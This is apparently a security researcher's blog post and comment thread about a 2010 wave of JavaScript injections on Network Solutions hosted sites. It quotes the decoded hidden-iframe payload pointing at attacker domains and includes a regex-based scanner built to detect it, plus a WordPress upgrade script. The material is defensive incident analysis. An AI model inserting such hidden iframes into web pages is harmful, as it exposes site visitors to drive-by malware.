Network Solutions hacked again

Network Solutions is being hacked again. Just today we were notified of more than 50 sites compromised with the following malicious JavaScript:

If we decode this JavaScript, we see that it calls document.write on a string that injects this hidden (0x0) iframe, loading http://corpadsinc.com/grep/ :

document.write(s)
<iframe frameborder="0" onload='if (!this.src){ this.src="http://corpadsinc.com/grep/"; this.height=0; this.width=0;}'>

Note that this time all kinds of sites are being hacked: WordPress and Joomla installs as well as plain HTML sites.

UPDATE 1: Google is already blacklisting lots of them. Bad day to be a Network Solutions customer.

UPDATE 2: Some sites are also compromised with this encoded JavaScript:

which injects an iframe from http://mainnetsoll.com/grep/ (the same domain used in last week's attack):

<iframe frameborder="0" onload='if (!this.src){ this.src="http://mainnetsoll.com/grep/"; this.height=0; this.width=0;}'>

UPDATE 3: On some WordPress sites we analyzed, the malware was present only in the cache files generated by WP-Super-Cache; everything else was clean. A site whose PHP and theme files scan clean can therefore still serve the payload until that cache is purged.
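As an added example (not Sucuri's scanner and not code from the original post), the following Python script walks a web root and flags files carrying the injection described above. It matches the structure of the decoded payload (an iframe that sets its own src from its onload handler and collapses to 0x0) as well as the two domains named in this post, so a rotated domain is still caught; it also flags content appended after the closing </html> tag, which is where commenters below report the injected script landing. Cached output under wp-content/cache is scanned like any other HTML, because of the WP-Super-Cache finding in UPDATE 3. The sample web root it builds, including the example.invalid domain and the file paths, is constructed for the demo.

```python
# Added example (not code from the original post or from Sucuri): walk a web
# root and flag files carrying the hidden-iframe injection described above.
import os
import re
import tempfile

# Iframe target domains named in this post.
KNOWN_DOMAINS = ("corpadsinc.com", "mainnetsoll.com")

# Structure of the decoded payload: an iframe that assigns its own src from
# its onload handler and then collapses to 0x0. Matching the structure rather
# than only the hostname still catches a rotated domain.
LAZY_IFRAME_RE = re.compile(
    r"<iframe[^>]*onload\s*=\s*['\"]\s*if\s*\(\s*!\s*this\.src\s*\)\s*\{\s*this\.src\s*=",
    re.IGNORECASE,
)
DOMAIN_RE = re.compile("|".join(re.escape(d) for d in KNOWN_DOMAINS), re.IGNORECASE)
HTML_END_RE = re.compile(r"</html\s*>", re.IGNORECASE)

# Files worth reading: index.*, default.html and PHP files are the ones
# reported hit, and WP-Super-Cache output (wp-content/cache) is plain HTML.
WEB_SUFFIXES = (".html", ".htm", ".php", ".js", ".cgi", ".pl")


def scan_text(text):
    """Return the indicators found in one file's content (empty list if clean)."""
    found = []
    if LAZY_IFRAME_RE.search(text):
        found.append("lazy-src hidden iframe")
    match = DOMAIN_RE.search(text)
    if match:
        found.append("known domain: " + match.group(0).lower())
    ends = list(HTML_END_RE.finditer(text))
    if ends and text[ends[-1].end():].strip():
        # Payload appended after the closing tag, as reported for counter.cgi.
        found.append("content after </html>")
    return found


def scan_tree(root):
    """Walk root and map each flagged file (relative, '/'-separated) to its indicators."""
    hits = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(WEB_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    indicators = scan_text(fh.read())
            except OSError:
                continue
            if indicators:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = indicators
    return hits


# Constructed sample content modelled on the decoded iframe quoted above.
SAMPLE_INJECTED = (
    "<html><body>Welcome</body></html>\n"
    "<script>document.write(\"<iframe frameborder=\\\"0\\\" onload='if (!this.src){ "
    "this.src=\\\"http://corpadsinc.com/grep/\\\"; this.height=0; this.width=0;}'>"
    "</iframe>\")</script>\n"
)
SAMPLE_CLEAN = "<html><body>Welcome</body></html>\n"
# Same structure, hypothetical unknown domain: caught by the structural match alone.
SAMPLE_ROTATED = (
    "<?php /* index.php dropped into a folder that had none */ ?>\n"
    "<script>document.write(\"<iframe frameborder=\\\"0\\\" onload='if (!this.src){ "
    "this.src=\\\"http://example.invalid/grep/\\\"; this.height=0; this.width=0;}'>"
    "</iframe>\")</script>\n"
)


def build_sample_tree():
    """Create a constructed web root in a temp dir: one clean file, three infected."""
    root = tempfile.mkdtemp(prefix="webroot-")
    layout = {
        "index.html": SAMPLE_INJECTED,
        "about.html": SAMPLE_CLEAN,
        "wp-content/cache/supercache/example.com/index.html":
            SAMPLE_INJECTED.replace("corpadsinc.com", "mainnetsoll.com"),
        "images/index.php": SAMPLE_ROTATED,
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for rel_path, indicators in sorted(scan_tree(target).items()):
        print(f"{rel_path}: {', '.join(indicators)}")
```

Run it as `python scan.py /path/to/docroot`; with no argument it scans the constructed fixture. It is detection only: as the comments on this post show, sites that were cleaned file by file were reinfected within hours while FTP credentials remained compromised or a modified CGI script (counter.cgi in one report) kept rewriting pages, so a clean scan is the starting point, not the fix.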

UPDATE 4: Post from http://stopmalvertising.com explaining their findings on this issue.

UPDATE 5: Network Solutions updated their blog, apologizing to their clients and saying that they are working hard to fix it. Hopefully it will be solved soon.

As always, if you need help recovering from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://www.blogger.com/profile/02367812323043710058 Shashi Bellamkonda

    Hi David,

    We are aware of the issue – see advisory here http://bit.ly/aprfix. As always, appreciate the support from the community.

    Regards,

    Shashi Bellamkonda
    @netsolcares on Twitter

  • Anonymous

    I've been hacked. Happened around 2:40 PM on my NS Shared.

    They are hitting WordPress index.php files.

  • Anonymous

    They've inserted coded script in the following.

    index.php
    wp-content/index.php
    wp-content/themes/index.php
    wp-content/plugins/index.php
    wp-admin/index.php

    4/18/2010 at 2:54 PM

  • http://www.video-music.info Dejan Švajner

    WP index.html deleted (640 permissions), ftp access changed.

  • http://www.epa.gov ElvisTie

    Indeed, sucks to be a Network Solutions customer now. All index.* files were hit and ftp password was changed.

  • Anonymous

    I can't log in with SFTP even with the new password.

  • Anonymous

    My ftp password didn't get changed, but all my index.* files have had code inserted into them. Vanilla html, no WordPress, etc.

  • Anonymous

    Update — a file named default.html also was affected on my site. Anybody have any other file names affected?

  • Anonymous

    So what are the steps at least for now to get our site back to normal?

    And what do we need to do to prevent this and similar hacks in the future?
    Do we need to make our permissions tighter, and if we do what files specifically without interfering with our server's and wordpress' communications and updates?

  • Anonymous

    man… this has been going on for weeks. The solution? Ditch Network Solutions… their security sucks and they are always getting hacked.

    -pissed developer.

  • Anonymous

    My NS site was hacked twice.
    It doesn't help that NS doesn't seem to promptly offer updated WP installs on their hosting.
    I'm not particularly savvy at updating WP, and many others are not either. It would help if at least WP didn't serve up old, outdated versions of WP.

  • Anonymous

    It is not a WordPress problem. NS security was compromised. They also restored malware from backups in some cases.

    A fresh install is always good but won't work if the main security is compromised.

    Upgrading WP is usually easy since 2.7 or so. However, that does not touch the wp-content folder (themes or uploads), which are likely malware locations.

  • http://www.epa.gov ElvisTie

    Indeed, NS is hiding behind a veil of distrust and not respecting their customer base that was affected, me included. I have issued at least 6 service requests in the past two weeks only to get boiler plate emails that the issue has been resolved, when my questions were never answered.

    Vanilla html was affected this time, and FTP passwords were compromised. NS can't blame WordPress this time around; shame on NS for not taking responsibility for their own security. Now thousands of sites have lost revenue due to their security issues. Web servers were compromised across several sectors of their farm, and somehow I think it may be an internal issue.

    With respect to WP upgrades, I upgrade my installations manually since NS does not keep the latest version immediately available.
    1. Download the latest WP update from the WP update site and unzip.
    2. Back up your entire blog folder to a remote location, then delete the wp-includes folder and all contents, the wp-admin folder and all contents, and all files in the root of the blog directory with the exception of the wp-config.php file. If you have any other manually edited files such as an .htaccess file, you will want to save that one also.
    3. Copy the new WP version folders wp-admin, wp-includes and all new files to the root directory except the wp-config.php file.
    4. Log into your blog and then check that all your plug-ins are updated and update those also. Then re-activate all your plug-ins.

    Hope that helps!
    Regards,
    ET
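The four-step manual upgrade in the comment above, as a POSIX shell script. This is an added example, not Network Solutions' or WordPress's own tooling and not code from the comment; it assumes the new release has already been downloaded and unzipped into a directory (the wordpress/ folder from the zip), that the site-specific files to preserve are wp-config.php, .htaccess and wp-content, and that tar is available for the backup. The demo() fixture at the bottom is constructed so the function can be exercised without a real WordPress download.

```shell
#!/bin/sh
# Added example (not Network Solutions' or WordPress's own tooling): the manual
# core upgrade outlined in the comment above, as a script. Assumes the new
# release is already unpacked into $new_core (the wordpress/ directory from the
# zip) and that the install's site-specific files are wp-config.php, .htaccess
# and wp-content, which are left untouched.
set -eu

wp_manual_upgrade() {
    blog="$1"        # existing install, e.g. /var/www/html/blog
    new_core="$2"    # unpacked release directory containing wp-admin, wp-includes
    backup="$3"      # tar archive written before anything is deleted

    # Step 2 (backup): archive the whole blog directory first.
    tar -C "$(dirname "$blog")" -cf "$backup" "$(basename "$blog")"

    # Step 2 (delete): shipped core directories and root files go; keep
    # wp-config.php, .htaccess and wp-content. Other directories are left
    # alone so a custom uploads dir at the root survives.
    rm -rf "$blog/wp-admin" "$blog/wp-includes"
    for f in "$blog"/* "$blog"/.[!.]*; do
        [ -e "$f" ] || continue
        case "$(basename "$f")" in
            wp-config.php|.htaccess|wp-content) continue ;;
        esac
        if [ -f "$f" ]; then rm -f "$f"; fi
    done

    # Step 3: copy the new core in, everything except wp-config.php.
    cp -R "$new_core/wp-admin" "$new_core/wp-includes" "$blog/"
    for f in "$new_core"/*; do
        [ -f "$f" ] || continue
        if [ "$(basename "$f")" = "wp-config.php" ]; then continue; fi
        cp "$f" "$blog/"
    done
    # Step 4 (log in, update and re-activate plugins) happens in the dashboard.
}

# Constructed fixture: a tiny "old" install and a tiny "new" release, so the
# function can be exercised without a real WordPress download.
demo() {
    work=$(mktemp -d)
    blog="$work/blog"
    core="$work/wordpress"
    mkdir -p "$blog/wp-admin" "$blog/wp-includes" "$blog/wp-content/themes" \
             "$core/wp-admin" "$core/wp-includes" "$core/wp-content"
    echo "old" > "$blog/wp-admin/admin.php"
    echo "old" > "$blog/index.php"             # the file the comments report hit
    echo "secret" > "$blog/wp-config.php"
    echo "rewrite" > "$blog/.htaccess"
    echo "theme" > "$blog/wp-content/themes/x.php"
    echo "new" > "$core/wp-admin/admin.php"
    echo "new" > "$core/wp-includes/version.php"
    echo "new" > "$core/index.php"
    echo "sample" > "$core/wp-config-sample.php"
    wp_manual_upgrade "$blog" "$core" "$work/backup.tar"
    echo "$work"
}

# Usage: sh upgrade.sh /path/to/blog /path/to/unpacked/wordpress /path/to/backup.tar
#        sh upgrade.sh demo
case "${1:-}" in
    demo) w=$(demo); echo "fixture upgraded under $w" ;;
    "")   ;;
    *)    wp_manual_upgrade "$1" "$2" "$3" ;;
esac
```

The script deliberately never touches wp-content, which the next comment points out is also where the malware tends to live (themes and uploads), so that directory still has to be scanned separately; and, as several commenters found, a freshly reinstalled core does not stay clean while the FTP credentials or the host itself remain compromised.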

  • Anonymous

    My vanilla html site has now had malicious code inserted 6 times in the last 24 hours. Their tech support has nothing helpful to say. I have now pulled my site down altogether as I can't otherwise prevent my (largely un-tech-savvy) visitors from the threat posed by this code.

  • Anonymous

    I was hit as well. I'm running Joomla, and the index.php file was altered with the JS. Also, index files were created in subfolders, "images" for example, where they did not exist previously. I changed all ftp pws and it stopped.

  • Anonymous

    Another vanilla html site was hit. I removed the malicious code and am waiting for the following attack, I suppose. Some weeks ago our ftp passwords were also compromised. It is not the first time NS was attacked. And apparently all kinds of sites are attacked. I will advise my clients to change provider. It seems to be the only real solution.

  • Anonymous

    I was Hacked too, and I just have a vanilla html site.

  • Anonymous

    We use Network Solutions as our hosting and email provider but unlike the rest of you, our website was unaffected. Our problem is that our email stopped working last Friday and I am wondering if this had anything to do with the hack. It took me 15 phone calls for them to explain that we had violated their TOS agreement for spamming. It's funny that we don't advertise via email but through direct mail. So WITHOUT ANY NOTIFICATION, they shut down our POP services and have crippled our business. They also have not provided any proof of these accusations, which makes me incredibly irate. We have been using Network Solutions for around 60 days now, and in 15 years of using our last provider, we never experienced any issues whatsoever. We needed to switch because we needed a Windows platform. I also found out that we can send mail but cannot receive it. I would think that for a spamming violation, the opposite would happen: cannot send but can receive. What do you guys think about this? I think it should be passed on to legal.

  • Anonymous

    I am new to NS. I've been developing my new project for 75 days and haven't even officially deployed my site yet; it's in "In Production Mode" when you go to my URL. I was affected by the breach/hacks.

    I thought NS would be a real safe and secure choice with all the big name sites and blogs using them and assumed they had top notch security for customers.

    Guess I misjudged that decision.

  • Anonymous

    This is the form email I received when I notified Network Solutions on 4/11 that I thought something fishy was going on with one of my sites:

    Thank you for contacting Network Solutions Customer Service Department. We are committed to creating the best Customer experience possible. One of the first ways we can demonstrate our commitment to this goal is to quickly and efficiently handle your recent request. We apologize for any inconvenience this may have caused you. Based on your concern, proponents of malware commonly look for websites with vulnerabilities. These include weak passwords, third party applications that are not up to date or sometimes weakness could emanate from lack of updated anti-virus software on PCs. A large part of preventing these events comes from users taking preventive steps such as:

    - Routinely change passwords including FTP/ blog/content management software
    - Update your blog/content management software to the latest version.
    - Update any plug-ins or 3rd party scripts or code you may have for your website
    - Update firewalls & anti-virus on your local PCs.
    - Make sure your file permissions are set correctly and do not allow unauthorized access.

    This is not an exhaustive list and these incidents can happen for a number of reasons. Just cleaning it once is not enough to resolve this. You should always take precautions.

  • Anonymous

    Is NS even going to be able to repair themselves or is this a irreparable mess.

  • Anonymous

    What irritates me the most is the shield of secrecy that NS operates under. Why don't they come out and own the fact that they've been hacked? I host more than 15 sites on NS and have been with them for over 10 years. But I have always found their service below par. They try to blame YOU for all their own shortcomings (as I read above in the 'email-not-working' case and the security 'advisory' mail sent to another helpless complainant).

    Hey, Shashi Bellamkonda… are you reading this? We're all eagerly awaiting your response on all this… Mr. netsolcares!!!

    Shit happens… at least be honest about it!

    Shame on NS!

  • Anonymous

    All my wordpress sites were hacked with the code that appears here:

    http://jsunpack.jeek.org/dec/go?report=b370ae651ac14878cd73222ec641390db995de8a

    wordpress/index.php files all had the code inserted – my joomla installation was untouched though.

    Each wordpress install is on a different db with different passwords…

  • http://www.blogger.com/profile/02179754956717252563 sdpate

    The last of my three sites NJN Network went down tonight. NetSol are not getting close to cleaning up their servers.

  • http://www.helponline.pro Dejan Švajner

    Today, again.
    Script in index file on my site http://www.helponline.pro
    04/22/10/ 09:21:00 CET+1

  • Anonymous

    web-search.com hacked again at 7:58am server time 4/22
    I took most stuff down for now.
    All cgi removed 2 weeks ago just in case.

    The worst part of all this is NS tried to tell me I had a problem with my content when I first told them about it 17 days ago.
    All the while knowing that many others had the same problem.
    I spent hours going through everything and kept getting hacked.
    If NS had been honest, I'd have saved countless hours trying to fix something I had no control over.
    Just a comment: Why is it that when I do searches for hacks, there are references all over the place to fileman.cgi, which NS uses?

    Not a happy camper.
    Bob

  • Anonymous

    BTW Does anyone know how long it takes for pages that have been removed due to this hack, to be deleted from search results?

  • http://www.helponline.pro Dejan Švajner

    #Anonymous: in my case, Google responded within a few hours after my report in Webmaster Tools.

  • B4Cier

    Hey Everybody, I have a straight up HTML site that kept having the index.html altered. I tried putting a redirect meta in the page code to prevent it from loading the malicious script, but a meta redirect still loads up to the body and the code is being inserted after the meta tags. My solution is to setup a 301 redirect (see: http://www.isitebuild.com/301-redirect.htm ) in .htaccess. That way the server never sends index.html to the requestor and replaces it with whatever page you put in the redirect page section of .htaccess. Hope this helps anyone. I'm super pissed @ NetSol, but pre-paid for 1 year hosting and can't back out now…

  • B4Cier

    It also works for crawlers… so search engines won't see the malicious code and knock you down the ratings board :)

  • Anonymous

    Network Solutions should make all this "right" somehow. This has not been funny for any of us.
    Over 2 weeks of this —so far——-

  • Anonymous

    My html web site has been hit too. It seems to be a new exploit they are using. It's some sort of PDF vulnerability.

    I called tech support and they said it could be 24 to 48 hours. My response was "why the hell have you not unplugged the server???" They are spreading the virus all over the place while they attempt to fix it. Unplug the damn servers until the problem is fixed!!!

  • Anonymous

    Jumped ship myself…hosted a fair few sites over the years with a fair few hosts…but NetSol have proved to be by far the worst. This has really been the final straw with these guys.

  • Anonymous

    My sites attacked again during the night (early am 4/23)
    But now I'm unable to use ftp on ANY of my servers (3)
    Before it was just one affected.

    This is far from over.
    Oh btw, form letter from NS saying they found no bad code on the example I sent them.
    Is anyone even checking?

    Bob

  • Anonymous

    I caught the issue on my client's site. Unfortunately since we take very sensitive information from their customers I couldn't just change the code and be happy, so unfortunately I have been up all night (caught the issue at midnight and after 6 hours getting it all fixed, transferring all files, database, and DNS records over to a dedicated server), and I finally get to go to bed!

  • Anonymous

    This mess has been going on for almost a whole month now.

    Complete the equation.

  • Anonymous

    This seems like class action material

  • Anonymous

    Finally got back into my NS file manager today after waiting since Tues for them to fix things.

    My index files are hacked with script again.

  • Anonymous

    I don't know what to do. I'm two months into a NS shared hosting one year package. In production (a start up), not even public yet. I take security seriously, do scans daily, firewall, backups nightly, don't store info in my SFTP program, log in manually each time when I use SFTP, etc., etc. It's full time work. I am getting killed by these hacks.

  • Anonymous

    Still happening at 1430 CST. Had a new type of script inserted in a bait index.html page. This script starts out as "var gID=new Date();var kK=false;var dKA;var cNM;if(cNM!='xYN' && cNM != ''){cNM=nul"

  • Anonymous

    Still happening as of 1430 CST. Hit a bait index.html file. New script being used I think, it starts out as "Xvar gID=new Date();var kK=false;var dKA;var cNM;if(cNM!='xYN' && cNM != ''){cNM=nulX" but without the X's

  • Anonymous

    Still happening at 1430 CST . . .

    It's out of control obviously. What are we supposed to do? This is insane I didn't pay for this or deserve this.

    Steve

  • http://www.blogger.com/profile/14980808976404159238 http://sucuri.net

    @Steve, what is your site name? I would like to try this…

    @Anonymous: Did the scanner pick it up?

  • Anonymous

    @Steve, what is your site name?

    I'm not public yet. I already scanned them today with the Sucuri scanner with production/maintenance mode disabled and they came up RED. I was hacked last Sunday; we restored the database Monday. I made backups of the restored sites. Everything looked clean. They are still clean locally. Finally was able to get back into the NS file manager today. First thing I noticed was a weird modify date, and I opened it up and it was hacked. Also on my SMF forum.

  • Anonymous

    Still paralyzed. Even a database restore from last Tues is messed up.

  • Bob

    Site seems ok now but interesting problem.
    I can log into file manager and manage account just fine but not using WS-FTP program on my computer. Passwords are fine as they are the same as file manager at NS.
    Any thoughts?
    Is NS blocking outside programs at this moment?

    Bob

  • Anonymous

    Has anyone had their site blacklisted by google?? i ran sucuri scanner and came up negative, changed password, and deleted old files in server. i then uploaded new clean files. what is the turn around time for google to de-blacklist you and get your site up again in search results?? this is killing us!!

  • Bob

    Using the Google tool it took me about 24 hours or less to get the blacklisting taken off. You do need to verify you own the site to get them to do anything. It's as simple as adding a Google code to your index page.

    BTW This is funny as hell to me at least. This is the current message I get when logging into file manager right now.

    "This Connection is Untrusted

    You have asked Firefox to connect securely to http://www.networksolutions.com, but we can't confirm that your connection is secure.

    Normally, when you try to connect securely, sites will present trusted identification to prove that you are going to the right place. However, this site's identity can't be verified."

  • Bob

    Details of above:

    http://www.networksolutions.com uses an invalid security certificate.

    The certificate is not trusted because the issuer certificate has expired.
    The certificate will not be valid until 1/21/2009 7:00 PM.

    (Error code: sec_error_expired_issuer_certificate)

  • Bob

    Certificate is now fixed but still not able to get in using WS-FTP
    Have to use web based system at NS

    Bob

  • Bob

    Would someone from Sucuri contact them and find out if this is going to be fixed or is some new process now in place?
    I notice that to use file manager now there are now two layers to go through to get to files. Perhaps this is a solution they've decided to implement?

    Bob

  • http://www.blogger.com/profile/13404429802520793570 Tobin

    After searching through most of the night I found our problem at the bottom of counter.cgi in the cgi-bin directory. It was injecting the malware script into all php pages (not just wordpress) after the final HTML tag. Removed it and now we're coming up clean on the sucuri scanner.

    I'm not very happy with NS right now.

    Tobin

  • Anonymous

    I'm on shared hosting. I was hit last Sunday. And again yesterday. I'm wondering if poorly maintained blogs (or even abandoned ones) on this setup might be part of the problem. NS should check all shared hosting blogs with some kind of automated checking system and notify these owners that "we've noticed you haven't logged in to your account for 30 days.
    We have sent you important security notifications; please check your inbox." If these blogs are infected and launching these attacks, those of us who are on top of things pay the price.

    There should be some kind of requirement that shared hosting blog owners have to maintain proper security with no exceptions. That's not too much to ask. If they cannot, they should get a free blog setup where they don't have to deal with maintenance.

  • Bob

    Anyone have any idea when the nearly constant resetting of passwords will end?
    Wouldn't be so bad but there is no notification it's going to happen. You only find out by logging in as admin when your ftp program fails

    Bob

  • Anonymous

    No clue Bob.

    I can't even set my proper file permissions and make them stick for my own installs either.

    Apparently the only winning move at this point is not to play.

  • Bob

    Aren't we all getting tired of these message:

    [10:17:37 AM] Bob Bradley: ALERT: An important message from Network Solutions Customer Service

    We are currently experiencing high call volumes and you may experience longer hold times. You may also experience delays in making modifications to your account or website or even making account level changes or updates. We are aware of these issues, and our Engineers are working diligently to resolve the matter.

  • Bob

    PS I tried using file manager to set permissions but like you, it isn't changing.
    WS-FTP works "some" of the time but you almost have to sit on it to get anywhere.
    Very unproductive to say the least.

    Don't even think about calling. lol

    Bob

  • Anonymous

    I am using WordPress Bob and they aren't being much help either.

    If you're not part of the WordPress "Club", apparently we're on our own.

  • Anonymous

    Now I can't even upgrade and remove plugins or change permissions via file manager.

  • Anonymous

    My html web site is still totally down. Also, their main web page at networksolutions.com was serving a virus at 3:15pm Pacific time on 4-26-10. It's fixed now. I wish they would fix my site so quickly.

  • http://www.blogger.com/profile/15332304198321210453 Maggie

    If you are interested in learning more about network management my client Cisco is hosting Cisco Live at The Mandalay Bay Resort in Las Vegas…June 27th – July 1st.

  • http://www.blogger.com/profile/12767319822228590527 St. Luke’s

    Our site has been hacked 3 times now in the last four weeks. I have changed every password at least three times (and some four). It happened again last night with a different php code than before. All FTP passwords were reset (I assume by Netsol) so they must know what is happening. No official word from anybody and I can't wait on hold until they answer.

  • Pingback: Modified Websites Pushing Trojans On the Rise « Webroot Threat Blog

  • Pingback: Warning this Site May Harm Your Computer - Now What?

  • Pingback: WordPress Hacked with Corpadsinc.com at Network Solutions

  • Pingback: Network Solutions hosting compromised thousands of accounts | NJN Network

  • Pingback: New infections today at Network Solutions | Sucuri Blog
